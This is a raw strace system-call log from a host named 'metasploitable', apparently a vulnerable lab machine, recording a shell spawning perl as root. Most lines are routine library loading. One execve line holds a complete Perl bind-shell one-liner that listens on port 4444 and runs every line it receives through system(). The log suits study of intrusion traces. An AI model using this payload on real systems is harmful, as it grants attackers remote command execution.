10082 07:31:16.700940 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d78000

10082 07:31:16.700951 mmap2(0xb7d8c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d8c000

10082 07:31:16.700966 mmap2(0xb7d8e000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d8e000

10082 07:31:16.700990 close(1)          = 0

10082 07:31:16.701045 munmap(0xb7f1e000, 29913) = 0

10082 07:31:16.701094 open("/etc/ld.so.cache", O_RDONLY) = 1

10082 07:31:16.701107 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10082 07:31:16.701122 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f1e000

10082 07:31:16.701132 close(1)          = 0

10082 07:31:16.701142 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.701156 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10082 07:31:16.701170 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10082 07:31:16.701256 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10082 07:31:16.701273 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6e000

10082 07:31:16.701284 mmap2(0xb7d76000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d76000

10082 07:31:16.701300 close(1)          = 0

10082 07:31:16.701311 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10082 07:31:16.701324 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10082 07:31:16.701341 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10082 07:31:16.701428 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10082 07:31:16.701444 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d63000

10082 07:31:16.701455 mmap2(0xb7d6c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d6c000

10082 07:31:16.701481 close(1)          = 0

10082 07:31:16.701529 munmap(0xb7f1e000, 29913) = 0

10082 07:31:16.701562 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10082 07:31:16.701576 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10082 07:31:16.701587 _llseek(1, 0, [0], SEEK_CUR) = 0

10082 07:31:16.701598 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10082 07:31:16.701614 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f25000

10082 07:31:16.701624 _llseek(1, 1624, [1624], SEEK_SET) = 0

10082 07:31:16.701639 munmap(0xb7f25000, 1624) = 0

10082 07:31:16.701648 close(1)          = 0

10082 07:31:16.701676 getpgrp()         = 3831

10082 07:31:16.701686 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10082 07:31:16.701700 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10082 07:31:16.701716 brk(0x8101000)    = 0x8101000

10082 07:31:16.701746 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10082 07:31:16.701760 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10082 07:31:16.701774 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10082 07:31:16.701810 brk(0x8102000)    = 0x8102000

10082 07:31:16.701835 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10082 07:31:16.701853 stat64("/sbin/AB", 0xbf8cff28) = -1 ENOENT (No such file or directory)

10082 07:31:16.701865 stat64("/bin/AB", 0xbf8cff28) = -1 ENOENT (No such file or directory)

10082 07:31:16.701875 stat64("/usr/sbin/AB", 0xbf8cff28) = -1 ENOENT (No such file or directory)

10082 07:31:16.701887 stat64("/usr/bin/AB", 0xbf8cff28) = -1 ENOENT (No such file or directory)

10082 07:31:16.701899 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10082 07:31:16.701913 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d996f8) = 10083

10083 07:31:16.701956 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10083 07:31:16.701984 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10083 07:31:16.702024 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10083 07:31:16.702036 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10083 07:31:16.702067 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10083 07:31:16.702082 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10083 07:31:16.702094 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10083 07:31:16.702148 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10083 07:31:16.702162 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10083 07:31:16.702228 exit_group(127)   = ?

4519  07:31:16.707018 waitpid(10082,  <unfinished ...>

10082 07:31:16.737284 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10082 07:31:16.737284 --- SIGCHLD (Child exited) @ 0 (0) ---

10082 07:31:16.737284 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10083

10082 07:31:16.737284 waitpid(-1, 0xbf8cfba8, WNOHANG) = -1 ECHILD (No child processes)

10082 07:31:16.737284 sigreturn()       = ? (mask now [])

10082 07:31:16.737285 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10082 07:31:16.737285 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10082 07:31:16.737285 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10082 07:31:16.737285 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10082 07:31:16.737286 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10082 07:31:16.737286 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10082 07:31:16.737286 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10082 07:31:16.737286 stat64("/sbin/perl", 0xbf8cff58) = -1 ENOENT (No such file or directory)

10082 07:31:16.737286 stat64("/bin/perl", 0xbf8cff58) = -1 ENOENT (No such file or directory)

10082 07:31:16.737287 stat64("/usr/sbin/perl", 0xbf8cff58) = -1 ENOENT (No such file or directory)

10082 07:31:16.737295 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10082 07:31:16.737312 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10082 07:31:16.737336 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10082 07:31:16.737350 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d996f8) = 10084

10084 07:31:16.737438 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10084 07:31:16.737487 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10084 07:31:16.737500 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10084 07:31:16.737512 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10084 07:31:16.737527 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10084 07:31:16.737542 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10084 07:31:16.737555 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10084 07:31:16.737587 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10084 07:31:16.737669 brk(0)            = 0x8153000

10084 07:31:16.737689 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10084 07:31:16.737703 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f19000

10084 07:31:16.737718 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10084 07:31:16.737735 open("/etc/ld.so.cache", O_RDONLY) = 1

10084 07:31:16.737747 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10084 07:31:16.737763 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f11000

10084 07:31:16.737773 close(1)          = 0

10084 07:31:16.737783 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10084 07:31:16.737798 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10084 07:31:16.737811 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10084 07:31:16.737979 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10084 07:31:16.737997 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f0d000

10084 07:31:16.738009 mmap2(0xb7f0f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f0f000

10084 07:31:16.738024 close(1)          = 0

10084 07:31:16.738035 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10084 07:31:16.738049 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10084 07:31:16.738063 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10084 07:31:16.738148 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10084 07:31:16.738164 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ee8000

10084 07:31:16.738175 mmap2(0xb7f0b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f0b000

10084 07:31:16.738190 close(1)          = 0

10084 07:31:16.738201 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10084 07:31:16.738215 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10084 07:31:16.738228 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10084 07:31:16.738312 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10084 07:31:16.738328 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee7000

10084 07:31:16.738340 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ecf000

10084 07:31:16.738351 mmap2(0xb7ee3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ee3000

10084 07:31:16.738376 mmap2(0xb7ee5000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee5000

10084 07:31:16.738418 close(1)          = 0

10084 07:31:16.738447 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10084 07:31:16.738473 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10084 07:31:16.738487 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10084 07:31:16.738573 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10084 07:31:16.738590 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d80000

10084 07:31:16.738600 mmap2(0xb7ec9000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ec9000

10084 07:31:16.738615 mmap2(0xb7ecc000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ecc000

10084 07:31:16.738628 close(1)          = 0

10084 07:31:16.738639 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10084 07:31:16.738651 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10084 07:31:16.738666 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10084 07:31:16.738753 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10084 07:31:16.738769 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d4e000

10084 07:31:16.738779 mmap2(0xb7d57000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d57000

10084 07:31:16.738793 mmap2(0xb7d59000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d59000

10084 07:31:16.738805 close(1)          = 0

10084 07:31:16.738828 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d4d000

10084 07:31:16.738840 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d4d8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10084 07:31:16.738948 mprotect(0xb7ec9000, 4096, PROT_READ) = 0

10084 07:31:16.738993 munmap(0xb7f11000, 29913) = 0

10084 07:31:16.739044 set_tid_address(0xb7d4d908) = 10084

10084 07:31:16.739053 set_robust_list(0xb7d4d910, 0xc) = 0

10084 07:31:16.739098 futex(0xbfbd0870, 0x81 /* FUTEX_??? */, 1) = 0

10084 07:31:16.739131 rt_sigaction(SIGRTMIN, {0xb7ed32c0, [], SA_SIGINFO}, NULL, 8) = 0

10084 07:31:16.739180 rt_sigaction(SIGRT_1, {0xb7ed3340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10084 07:31:16.739209 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10084 07:31:16.739241 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10084 07:31:16.739295 uname({sys="Linux", node="metasploitable", ...}) = 0

10084 07:31:16.739366 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10084 07:31:16.739476 brk(0)            = 0x8153000

10084 07:31:16.739486 brk(0x8174000)    = 0x8174000

10084 07:31:16.739532 getuid32()        = 0

10084 07:31:16.739542 geteuid32()       = 0

10084 07:31:16.739551 getgid32()        = 0

10084 07:31:16.739559 getegid32()       = 0

10084 07:31:16.739595 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d2c000

10084 07:31:16.739622 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10084 07:31:16.739638 read(1, "\361\275y!", 4) = 4

10084 07:31:16.739651 close(1)          = 0

10084 07:31:16.739669 time(NULL)        = 1495625476

